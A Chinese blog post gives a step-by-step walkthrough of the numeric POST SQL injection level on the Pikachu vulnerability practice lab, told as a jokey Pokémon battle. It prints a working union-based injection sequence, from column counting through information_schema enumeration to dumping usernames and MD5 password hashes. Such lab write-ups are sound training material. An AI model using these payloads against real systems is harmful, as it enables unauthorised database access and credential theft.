欢迎光临散文网 会员登陆 & 注册

Pikachu 漏洞练习平台Sql Injection数字型注入(post)通关指南pika~pika~

2023-03-05 13:21 作者:Yukito_online  | 我要投稿

Sql Inject(SQL注入)概述(CTRL+C+V来的)

  • 哦,SQL注入漏洞,可怕的漏洞。

  • 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。
                           一个严重的SQL注入漏洞,可能会直接导致一家公司破产!
     SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。       从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
                       

  • 在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
    1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
    2.使用参数化(Parameterized Query 或 Parameterized Statement);
    3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!


  •                    
  • SQL注入在网络上非常热门,也有很多技术专家写过非常详细的关于SQL注入漏洞的文章,这里就不在多写了。
    你可以通过“Sql Inject”对应的测试栏目,来进一步的了解该漏洞。                    

我反手就是一个开启burp抓包,当然也可以用postman

选择1,查询!

观察数据包,id=1就决定注入点是你了!上吧!!

Yukito对数据包使用了Send to Repeater

面对Yukito的Send to Repeater!,服务器的回应是:

hello,vince

your email is: vince@pikachu.com


服务器的回合!

pika~pika~

服务器对Yukito使出了卖萌技能!什么都没有发生!


Yukito的回合!


Yukito对服务器使用了id=1-1

面对Yukito的id=1-1服务器的回应是!

您输入的user id不存在,请重新输入!


服务器的回合!

pika~pika~

服务器对Yukito使出了卖萌技能!什么都没有发生!


Yukito的回合!

Yukito对服务器使用了id=1 order by 3#!效果拔群!!

面对Yukito的id=1 order by 3#服务器的回应是!

Unknown column '3' in 'order clause'


服务器的回合!

pika~pika~

服务器对Yukito使出了卖萌技能!什么都没有发生!


Yukito的回合!


Yukito对服务器使用了id=1 union select version(),database()#!效果拔群!!

面对Yukito的id=1 union select version(),database()#服务器的回应是!

hello,vince

 your email is: vince@pikachu.com class='notice'

hello,5.7.26

your email is: pikachu


服务器的回合!

pika~pika~

服务器对Yukito使出了卖萌技能!什么都没有发生!


Yukito的回合!

Yukito对服务器使用了id=1 union select 1,table_name from information_schema.tables where table_schema =database()#!效果拔群!!

面对Yukito的id=1 union select 1,table_name from information_schema.tables where table_schema =database()#服务器的回应是!

hello,vince 

your email is: vince@pikachu.com

hello,1 

your email is: httpinfo

hello,1

your email is: member

hello,1 

your email is: message

hello,1 

your email is: users

hello,1 

your email is: xssblind

服务器的回合!

pika~pika~

服务器对Yukito使出了卖萌技能!什么都没有发生!


Yukito的回合!

Yukito对服务器使用了id=1 union select 1,column_name from information_schema.columns where table_name ="users"#!效果拔群!!

面对Yukito的id=1 union select 1,column_name from information_schema.columns where table_name ="users"#服务器的回应是!

hello,vince

your email is: vince@pikachu.com

hello,1

your email is: user_id

hello,1 

your email is: first_name

hello,1 

your email is: last_name

hello,1 

your email is: user

hello,1

your email is: password

hello,1

your email is: avatar

hello,1

your email is: last_login

hello,1 

your email is: failed_login

hello,1 

your email is: CURRENT_CONNECTIONS

hello,1

your email is: TOTAL_CONNECTIONS

hello,1 

your email is: id

hello,1 

your email is: username

hello,1 

your email is: level


服务器的回合!

pika~pika~

服务器对Yukito使出了卖萌技能!什么都没有发生!


Yukito的回合!

Yukito对服务器使用了id=1 union select username,password from users#!效果拔群!!

面对Yukito的id=1 union select username,password from users#服务器的回应是!

hello,vince 

your email is: vince@pikachu.com

hello,admin 

your email is: e10adc3949ba59abbe56e057f20f883e

hello,pikachu 

your email is: 670b14728ad9902aecba32e22fa4f6bd

hello,test

your email is: e99a18c428cb38d5f260853678922e03

服务器倒下了!

Yukito获得了胜利!

不光是burp一个工具可以使用,我们来看postman的表现!







Pikachu 漏洞练习平台Sql Injection数字型注入(post)通关指南pika~pika~的评论 (共 条)

分享到微博请遵守国家法律